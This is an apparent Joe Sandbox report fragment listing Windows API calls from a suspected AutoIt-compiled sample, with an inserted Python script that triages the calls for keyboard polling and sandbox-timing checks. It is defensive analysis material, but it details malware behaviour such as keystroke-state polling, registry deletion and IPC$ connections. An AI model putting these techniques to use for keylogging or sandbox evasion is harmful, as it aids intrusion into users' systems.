• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0013DCBC
Strings
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0015CC64
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0015CC8D
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0015CD48
  • Part of subcall function 0015CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0015CCAA
  • Part of subcall function 0015CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0015CCBD
  • Part of subcall function 0015CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0015CCCF
  • Part of subcall function 0015CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0015CD05
  • Part of subcall function 0015CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0015CD28
• RegDeleteKeyW.ADVAPI32(?,?), ref: 0015CCF3
Strings
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00143D40
• _wcslen.LIBCMT ref: 00143D6D
• CreateDirectoryW.KERNEL32(?,00000000), ref: 00143D9D
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00143DBE
• RemoveDirectoryW.KERNEL32(?), ref: 00143DCE
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00143E55
• CloseHandle.KERNEL32(00000000), ref: 00143E60
• CloseHandle.KERNEL32(00000000), ref: 00143E6B
Strings
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
APIs
• timeGetTime.WINMM ref: 0013E6B4
  • Part of subcall function 000EE551: timeGetTime.WINMM(?,?,0013E6D4), ref: 000EE555
• Sleep.KERNEL32(0000000A), ref: 0013E6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0013E705
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0013E727
• SetActiveWindow.USER32 ref: 0013E746
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0013E754
• SendMessageW.USER32(00000010,00000000,00000000), ref: 0013E773
• Sleep.KERNEL32(000000FA), ref: 0013E77E
• IsWindow.USER32 ref: 0013E78A
• EndDialog.USER32(00000000), ref: 0013E79B
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
• Opcode ID: 6efb6116c9d9caf01c3a4c4fad97e0ebb00d81e83fbdb4cdc4189883b9ad437b
• Instruction ID: a9f8c30c99517a251897f24dd7b0d9a43162d70b67d1ac37e7baba657d1c513e
• Opcode Fuzzy Hash: 6efb6116c9d9caf01c3a4c4fad97e0ebb00d81e83fbdb4cdc4189883b9ad437b
• Instruction Fuzzy Hash: 042193B0240345AFFB105F64EC99A363BA9FB56359F100425F856C2EF1DBB1AC808BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0013EA5D
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0013EA73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0013EA84
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0013EA96
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0013EAA7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: 33535f0da15c45ed2a4ffe4935ce60ce759ad82d2b063dd1c5e59f429f327718
• Instruction ID: 05f88c029dd99bb603971fa34fa24df843ebea61aed2da2723702fea49ec1991
• Opcode Fuzzy Hash: 33535f0da15c45ed2a4ffe4935ce60ce759ad82d2b063dd1c5e59f429f327718
• Instruction Fuzzy Hash: DF1112216503597DEB10A7A1DD4AEFB7ABCEBD1B44F40042A7411A21D1DB705945C5B1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?), ref: 0013A012
• SetKeyboardState.USER32(?), ref: 0013A07D
• GetAsyncKeyState.USER32(000000A0), ref: 0013A09D
• GetKeyState.USER32(000000A0), ref: 0013A0B4
• GetAsyncKeyState.USER32(000000A1), ref: 0013A0E3
• GetKeyState.USER32(000000A1), ref: 0013A0F4
• GetAsyncKeyState.USER32(00000011), ref: 0013A120
• GetKeyState.USER32(00000011), ref: 0013A12E
• GetAsyncKeyState.USER32(00000012), ref: 0013A157
• GetKeyState.USER32(00000012), ref: 0013A165
• GetAsyncKeyState.USER32(0000005B), ref: 0013A18E
• GetKeyState.USER32(0000005B), ref: 0013A19C
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 3c59aa2f9fbcc1b6c1e1f311b12e66b478cc1d9ba052d23a87a453cb634b2851
• Instruction ID: 657109ec3e3e1502d6433e8eceb3f2a00fd184177c0cbf3a1f3ad5c40f74b522
• Opcode Fuzzy Hash: 3c59aa2f9fbcc1b6c1e1f311b12e66b478cc1d9ba052d23a87a453cb634b2851
• Instruction Fuzzy Hash: 0651DA30A0478829FB35EB7088557EBBFF49F12380F48859DD5C2571C2DB94AA8CC7A2
Uniqueness

Uniqueness Score: -1.00%
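
The two function summaries above (the timeGetTime/Sleep dialog loop with its "BUTTON" window search, and the routine that polls GetAsyncKeyState/GetKeyState for 0xA0, 0xA1, 0x11, 0x12 and 0x5B) are the kind of API lists a reviewer reads by hand when working through a report this long. The script below is an added example, not Joe Sandbox code and not part of this report: it parses the report's "APIs" bullets into structured records and runs two triage heuristics over them, decoding the polled virtual-key codes to their winuser.h names and flagging a function that reads timeGetTime at least twice around a Sleep. The regex, the VK table and the heuristics are assumptions made here; the sample input is copied from the bullets above and concatenated only so one run exercises both checks.

```python
"""Parse Joe Sandbox function-summary 'APIs' bullets into structured calls
and run two triage heuristics over them (modifier-key polling and
timeGetTime/Sleep elapsed-time checks). Added example, not Joe Sandbox code;
the regex and the VK table are assumptions made here."""
import re
from dataclasses import dataclass, field
from typing import Optional

# One bullet from the report's "APIs" list. Both shapes occur on the page:
#   • Sleep.KERNEL32(0000000A), ref: 0013E6E1
#   • Part of subcall function 000EE551: timeGetTime.WINMM(?,?,0013E6D4), ref: 000EE555
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list = field(default_factory=list)   # raw argument strings, '?' if unresolved
    ref: int = 0                               # address of the call site
    parent: Optional[int] = None               # subcall function address, if nested


def parse_api_lines(text: str) -> list:
    """Return an ApiCall for every bullet in text, in report order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # section headers such as "APIs" or "Strings" carry no call
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        parent = m.group("parent")
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16),
                             int(parent, 16) if parent else None))
    return calls


# winuser.h virtual-key constants for the codes the report shows being polled.
VK_NAMES = {0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}


def vk_name(arg: str) -> str:
    """Map a hex argument of GetKeyState/GetAsyncKeyState to its VK_ name."""
    try:
        code = int(arg, 16)
    except ValueError:
        return arg  # '?' means the sandbox could not resolve the argument
    return VK_NAMES.get(code, f"VK_0x{code:02X}")


def triage(calls: list) -> dict:
    """Two heuristics a reviewer would run over one function's API list."""
    keys = sorted({vk_name(c.args[0]) for c in calls
                   if c.api in ("GetAsyncKeyState", "GetKeyState") and c.args})
    timed = [c for c in calls if c.api == "timeGetTime"]
    sleeps = [c for c in calls if c.api == "Sleep"]
    sleep_ms = [int(c.args[0], 16) for c in sleeps
                if c.args and c.args[0] != "?"]
    # Two timeGetTime reads plus a Sleep in one function is the shape of an
    # elapsed-time check: a sandbox that fast-forwards Sleep returns a delta
    # far below the requested interval. Heuristic only; see the usage note.
    return {
        "key_polling": keys,
        "timing_check": len(timed) >= 2 and bool(sleeps),
        "sleep_ms": sleep_ms,
    }


# Constructed sample: bullets copied from the two function summaries on this
# page (the timeGetTime/Sleep dialog loop and the GetAsyncKeyState routine),
# concatenated here only so one run exercises both heuristics.
SAMPLE = """\
APIs
• timeGetTime.WINMM ref: 0013E6B4
  • Part of subcall function 000EE551: timeGetTime.WINMM(?,?,0013E6D4), ref: 000EE555
• Sleep.KERNEL32(0000000A), ref: 0013E6E1
• EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0013E705
• Sleep.KERNEL32(000000FA), ref: 0013E77E
• GetAsyncKeyState.USER32(000000A0), ref: 0013A09D
• GetKeyState.USER32(000000A0), ref: 0013A0B4
• GetAsyncKeyState.USER32(00000011), ref: 0013A120
• GetAsyncKeyState.USER32(0000005B), ref: 0013A18E
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api}.{c.module}({', '.join(c.args)})")
    print(triage(parsed))
```

Both heuristics are leads, not verdicts. The report classifies this sample as a likely compiled AutoIt script, and a generic interpreter runtime carries keyboard-state and timing routines of its own whatever the embedded script does, so a hit in code at this image base says which runtime features exist, while the script's own logic decides whether they are used for keylogging or sandbox evasion. The `parent` field keeps the "Part of subcall function" distinction, which matters for the timing check: the second timeGetTime read here comes from a helper at 000EE551, so the elapsed-time comparison spans two functions.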

APIs
• GetDlgItem.USER32(?,00000001), ref: 00135CE2
• GetWindowRect.USER32(00000000,?), ref: 00135CFB
• MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00135D59
• GetDlgItem.USER32(?,00000002), ref: 00135D69
• GetWindowRect.USER32(00000000,?), ref: 00135D7B
• MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00135DCF
• GetDlgItem.USER32(?,000003E9), ref: 00135DDD
• GetWindowRect.USER32(00000000,?), ref: 00135DEF
• MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00135E31
• GetDlgItem.USER32(?,000003EA), ref: 00135E44
• MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00135E5A
• InvalidateRect.USER32(?,00000000,00000001), ref: 00135E67
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$ItemMoveRect$Invalidate
• String ID:
• API String ID: 3096461208-0
• Opcode ID: 7493719b4708fa4c9aa3741275f4e44a1f5997ccccfbef8f3bef3d7ee268273b
• Instruction ID: efa0cbc1375e23da2afb1220c49298a351938efdd801a9c18ffd871cef6744a8
• Opcode Fuzzy Hash: 7493719b4708fa4c9aa3741275f4e44a1f5997ccccfbef8f3bef3d7ee268273b
• Instruction Fuzzy Hash: 775121B0B00605AFDF18CFA8CD89AAEBBB6FB48711F108129F515E7690D7709E40CB60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E8BE8,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 000E8FC5
                                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 000E8C81
                                                                                                                                                                                                                                          • KillTimer.USER32(00000000,?,?,?,?,000E8BBA,00000000,?), ref: 000E8D1B
                                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00126973
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 001269A1
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,000E8BBA,00000000,?), ref: 001269B8
                                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,000E8BBA,00000000), ref: 001269D4
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 001269E6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 641708696-0
                                                                                                                                                                                                                                          • Opcode ID: 1f752d3e8a5effa828c05964dd6542381fc7fde0209b2ec868605ed910d5b69e
                                                                                                                                                                                                                                          • Instruction ID: 866f3ce6a780230f8264a535437136e4a7a27a4298b6304d242cef63392b57fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f752d3e8a5effa828c05964dd6542381fc7fde0209b2ec868605ed910d5b69e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8616A31502750EFCB359F16DD48B2AB7F1FB42316F24851DE086AB9A0CB75A9D0DB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000E9944: GetWindowLongW.USER32(?,000000EB), ref: 000E9952
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 000E9862
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ColorLongWindow
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 259745315-0
                                                                                                                                                                                                                                          • Opcode ID: 1bb6125916f118b98500de09ee555dd5e028d3584dc9a3bf77c6fe59c1c85d63
                                                                                                                                                                                                                                          • Instruction ID: 6b356c851bb4f04927a2c9ab5d2c9c9b1c11020950f1e5e989956836b9c961bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bb6125916f118b98500de09ee555dd5e028d3584dc9a3bf77c6fe59c1c85d63
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DE41D131104690EFDB205F399C88BBA7BA5AB07331F144615F9E2972F2DB709C82DB61
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0011F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00139717
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,0011F7F8,00000001), ref: 00139720
                                                                                                                                                                                                                                            • Part of subcall function 000D9CB3: _wcslen.LIBCMT ref: 000D9CBD
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0011F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00139742
                                                                                                                                                                                                                                          • LoadStringW.USER32(00000000,?,0011F7F8,00000001), ref: 00139745
                                                                                                                                                                                                                                          • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00139866
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                          • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                          • Opcode ID: 024b1589698c255f3874c0014a08de4131b81343a0ac3fea94c9c45364ca0feb
                                                                                                                                                                                                                                          • Instruction ID: f0da0c513b93110a8a77f741d4c1cc062a26b9865a965dd599aa212abc177aea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 024b1589698c255f3874c0014a08de4131b81343a0ac3fea94c9c45364ca0feb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65413A72900209AADF04EBE0DE86EEEB778AF55740F500066F60572192EB756F48CBB1
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 000D6B57: _wcslen.LIBCMT ref: 000D6B6A
                                                                                                                                                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 001307A2
                                                                                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 001307BE
                                                                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 001307DA
                                                                                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00130804
                                                                                                                                                                                                                                          • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0013082C
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00130837
                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0013083C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                                                                                                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                          • API String ID: 323675364-22481851
                                                                                                                                                                                                                                          • Opcode ID: d7a43fe3de6de368e0cd4871f780dd556c8715ea0e69172f25d813414be945f4
                                                                                                                                                                                                                                          • Instruction ID: 08e0eaf99464d336797e4ec03e18939515a83ec50f261fd3fba1439627b4aaa2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7a43fe3de6de368e0cd4871f780dd556c8715ea0e69172f25d813414be945f4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4411976D10229ABDF11EBA4DC959EDB7B8FF08750F04416AE941B3261EB709E44CBA0
                                                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0016403B
• CreateCompatibleDC.GDI32(00000000), ref: 00164042
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00164055
• SelectObject.GDI32(00000000,00000000), ref: 0016405D
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00164068
• DeleteDC.GDI32(00000000), ref: 00164072
• GetWindowLongW.USER32(?,000000EC), ref: 0016407C
• SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00164092
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 0016409E
Strings
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 77932b3d596011c639ce42c96e442126b465c8b6865db7b3d0fce8af9440364c
• Instruction ID: fdda59684439422a3494dd20202557063dc3a615415d588889ff27360d1aace9
• Opcode Fuzzy Hash: 77932b3d596011c639ce42c96e442126b465c8b6865db7b3d0fce8af9440364c
• Instruction Fuzzy Hash: F5316E32501215BBDF219FA8DC09FEA3B69FF0D324F110211FA65A61A0C7B5D8A0DBA4
Uniqueness

Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(?), ref: 00153C5C
• CoInitialize.OLE32(00000000), ref: 00153C8A
• CoUninitialize.OLE32 ref: 00153C94
• _wcslen.LIBCMT ref: 00153D2D
• GetRunningObjectTable.OLE32(00000000,?), ref: 00153DB1
• SetErrorMode.KERNEL32(00000001,00000029), ref: 00153ED5
• CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00153F0E
• CoGetObject.OLE32(?,00000000,0016FB98,?), ref: 00153F2D
• SetErrorMode.KERNEL32(00000000), ref: 00153F40
• SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00153FC4
• VariantClear.OLEAUT32(?), ref: 00153FD8
Memory Dump Source
• Source File: 00000004.00000002.2414085590.00000000000D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 000D0000, based on PE: true
• Associated: 00000004.00000002.2414050756.00000000000D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.000000000016C000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414160293.0000000000192000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414251081.000000000019C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2414288663.00000000001A4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_d0000_b3168c3d9b.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
• String ID:
• API String ID: 429561992-0
• Opcode ID: d39a2706c8ad1248549883dce6cf206904eda68db5fe3e8d520327be265ef9ca
• Instruction ID: 3b6561fa97ffa6a97c2e6ae5ef6d3e5b43e8f8477d24930a445c46b8ec79798a
• Opcode Fuzzy Hash: d39a2706c8ad1248549883dce6cf206904eda68db5fe3e8d520327be265ef9ca
• Instruction Fuzzy Hash: 3CC11371608205DFC700DF68C88496AB7E9FF89785F00491DF9A99B211DB71EE49CB62
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000), ref: 00147AF3
• SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00147B8F
• SHGetDesktopFolder.SHELL32(?), ref: 00147BA3
• CoCreateInstance.OLE32(0016FD08,00000000,00000001,00196E6C,?), ref: 00147BEF
• SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00147C74
• CoTaskMemFree.OLE32(?,?), ref: 00147CCC
• SHBrowseForFolderW.SHELL32(?), ref: 00147D57
